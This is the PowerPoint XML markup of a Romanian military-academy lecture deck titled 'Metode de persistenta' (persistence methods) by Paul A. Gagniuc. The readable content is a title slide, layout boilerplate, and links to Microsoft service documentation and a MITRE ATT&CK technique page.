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Lst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId37"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="365" r:id="rId4"/>
    <p:sldId id="366" r:id="rId5"/>
    <p:sldId id="521" r:id="rId6"/>
    <p:sldId id="469" r:id="rId7"/>
    <p:sldId id="494" r:id="rId8"/>
    <p:sldId id="447" r:id="rId9"/>
    <p:sldId id="376" r:id="rId10"/>
    <p:sldId id="448" r:id="rId11"/>
    <p:sldId id="399" r:id="rId12"/>
    <p:sldId id="396" r:id="rId13"/>
    <p:sldId id="397" r:id="rId14"/>
    <p:sldId id="401" r:id="rId15"/>
    <p:sldId id="402" r:id="rId16"/>
    <p:sldId id="403" r:id="rId17"/>
    <p:sldId id="405" r:id="rId18"/>
    <p:sldId id="406" r:id="rId19"/>
    <p:sldId id="407" r:id="rId20"/>
    <p:sldId id="408" r:id="rId21"/>
    <p:sldId id="409" r:id="rId22"/>
    <p:sldId id="410" r:id="rId23"/>
    <p:sldId id="411" r:id="rId24"/>
    <p:sldId id="414" r:id="rId25"/>
    <p:sldId id="415" r:id="rId26"/>
    <p:sldId id="412" r:id="rId27"/>
    <p:sldId id="413" r:id="rId28"/>
    <p:sldId id="479" r:id="rId29"/>
    <p:sldId id="473" r:id="rId30"/>
    <p:sldId id="474" r:id="rId31"/>
    <p:sldId id="475" r:id="rId32"/>
    <p:sldId id="476" r:id="rId33"/>
    <p:sldId id="477" r:id="rId34"/>
    <p:sldId id="478" r:id="rId35"/>
    <p:sldId id="616"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6665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88" autoAdjust="0"/>
    <p:restoredTop sz="94556" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="151" d="100"/>
          <a:sy n="151" d="100"/>
        </p:scale>
        <p:origin x="672" y="1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viewProps" Target="viewProps.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3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96F407-2509-4896-B052-D1E133D2D6C1}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/5/2025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9AC7B3-F878-493F-9CCE-D2C2EBD91389}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33153786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49AC7B3-F878-493F-9CCE-D2C2EBD91389}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17940130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84AC5B1-2738-48D4-A0C6-3A310133A60C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/5/2025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FA3F78-FC3A-4AB5-AD97-234B982F5D45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22167731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84AC5B1-2738-48D4-A0C6-3A310133A60C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/5/2025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FA3F78-FC3A-4AB5-AD97-234B982F5D45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39545554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84AC5B1-2738-48D4-A0C6-3A310133A60C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/5/2025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FA3F78-FC3A-4AB5-AD97-234B982F5D45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10857639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9/5/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="366658">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:endParaRPr>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solidFill>
                <a:srgbClr val="366658">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:endParaRPr>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32820389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8CB64A"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>9/5/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="8CB64A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="8CB64A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10558300" y="5956137"/>
            <a:ext cx="1052508" cy="365125"/>
          </a:xfrm>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38810729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9/5/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="366658">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:endParaRPr>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solidFill>
                <a:srgbClr val="366658">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:endParaRPr>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29509053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8CB64A"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>9/5/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="8CB64A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="8CB64A"/>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2700172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0E5FA6-3420-46C9-8B77-AD013BB1820D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8CB64A"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>9/5/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="8CB64A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="8CB64A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8"/>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41429855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8CB64A"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>9/5/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="8CB64A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="8CB64A"/>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373226937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0E5FA6-3420-46C9-8B77-AD013BB1820D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8CB64A"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>9/5/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="8CB64A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="8CB64A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>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4665805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9/5/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="366658">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:endParaRPr>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solidFill>
                <a:srgbClr val="366658">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:endParaRPr>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2387669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84AC5B1-2738-48D4-A0C6-3A310133A60C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/5/2025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FA3F78-FC3A-4AB5-AD97-234B982F5D45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="149655791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8CB64A"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>9/5/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="8CB64A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="8CB64A"/>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113933905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8CB64A"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>9/5/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="8CB64A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="8CB64A"/>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371793188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9/5/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="366658">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="774923" y="5951811"/>
            <a:ext cx="7896279" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="8CB64A"/>
              </a:solidFill>
            </a:endParaRPr>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270945912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2"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent2">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2"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent2">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2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1p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5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21420000">
            <a:off x="-9144" y="4882896"/>
            <a:ext cx="4050792" cy="1197864"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr lang="en-US" sz="5400" dirty="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="629D7D">
                  <a:lumMod val="50000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:endParaRPr>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5DB342A5-4CBE-4807-BFEF-CC88330B97D7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:prstClr>
              </a:solidFill>
            </a:endParaRPr>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3120386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421663221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18729463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232380798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8" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="629D7D">
                  <a:lumMod val="50000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8"/>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4089180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4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="629D7D">
                  <a:lumMod val="50000"/>
                </a:srgbClr>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6038601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3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="629D7D">
                  <a:lumMod val="50000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>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42595565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4AC5B1-2738-48D4-A0C6-3A310133A60C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/5/2025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FA3F78-FC3A-4AB5-AD97-234B982F5D45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291588552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73526080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66750909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351164114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416364457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US" sz="8000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>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lgn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="305746212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82674813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4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="629D7D">
                  <a:lumMod val="50000"/>
                </a:srgbClr>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348723888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4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="629D7D">
                  <a:lumMod val="50000"/>
                </a:srgbClr>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323562125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417389443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39139168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84AC5B1-2738-48D4-A0C6-3A310133A60C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/5/2025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FA3F78-FC3A-4AB5-AD97-234B982F5D45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28586447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84AC5B1-2738-48D4-A0C6-3A310133A60C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/5/2025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DFA3F78-FC3A-4AB5-AD97-234B982F5D45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2208373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84AC5B1-2738-48D4-A0C6-3A310133A60C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/5/2025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DFA3F78-FC3A-4AB5-AD97-234B982F5D45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11253062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4AC5B1-2738-48D4-A0C6-3A310133A60C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/5/2025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DFA3F78-FC3A-4AB5-AD97-234B982F5D45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8001801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84AC5B1-2738-48D4-A0C6-3A310133A60C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/5/2025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FA3F78-FC3A-4AB5-AD97-234B982F5D45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33558047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84AC5B1-2738-48D4-A0C6-3A310133A60C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/5/2025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FA3F78-FC3A-4AB5-AD97-234B982F5D45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4028580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theme" Target="../theme/theme3.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10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout32.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.jpg"/><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4AC5B1-2738-48D4-A0C6-3A310133A60C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/5/2025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FA3F78-FC3A-4AB5-AD97-234B982F5D45}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="458643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260E5FA6-3420-46C9-8B77-AD013BB1820D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8CB64A"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>9/5/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="8CB64A"/>
              </a:solidFill>
            </a:endParaRPr>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solidFill>
                <a:srgbClr val="8CB64A"/>
              </a:solidFill>
            </a:endParaRPr>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5DB342A5-4CBE-4807-BFEF-CC88330B97D7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8CB64A"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="8CB64A"/>
              </a:solidFill>
            </a:endParaRPr>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49210725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2"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent2">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2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1p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2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="629D7D">
                  <a:lumMod val="50000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:endParaRPr>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2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1p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420966609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learn.microsoft.com/en-us/windows/win32/services/writing-a-service-program-s-main-function" TargetMode="Externa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3.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s://attack.mitre.org/techniques/T1574/001/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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462210" y="875627"/>
            <a:ext cx="10218364" cy="2766528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng"/>
              <a:t>C.13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Metode de persistenta</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Paul A. Gagniuc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21419859">
            <a:off x="7300616" y="4413841"/>
            <a:ext cx="3958071" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="629D7D">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Academia Tehnică Militară „Ferdinand I”</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14101866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owchart: Process 4"/>
          <p:cNvSpPr/>
